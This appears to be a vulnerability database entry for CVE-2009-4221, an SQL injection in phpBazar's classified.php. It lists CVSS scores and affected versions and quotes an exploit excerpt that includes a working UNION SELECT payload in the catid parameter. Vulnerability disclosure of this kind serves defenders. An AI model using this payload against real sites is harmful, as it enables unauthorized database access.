7.5
CVSSv2

CVE-2009-4221

Published: 07/12/2009 Updated: 17/08/2017
CVSS v2 Base Score: 7.5 | Impact Score: 6.4 | Exploitability Score: 10
VMScore: 755
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P

Vulnerability Summary

SQL injection vulnerability in classified.php in phpBazar 2.1.1fix and previous versions allows remote malicious users to execute arbitrary SQL commands via the catid parameter, a different vector than CVE-2008-3767.

Vulnerable Product Search on Vulmon Subscribe to Product

smartisoft phpbazar 2.0.2

smartisoft phpbazar

smartisoft phpbazar 2.1.1

smartisoft phpbazar 2.1.0

Exploits

/* Author : MizoZ [from MA] Group : EvilWay, evilway[at]mail[dot]com Email : mizozx[at]gmail[dot]com Greetz : Zuka, Dyle !! MABROOK L3IIIIIIIIIID */ The vulnerability is in the $_GET['catid'] , exploit : server/classifiedphp?catid=2+and+1=0+union+all+select+1,2,3,4,5,6,7-- ...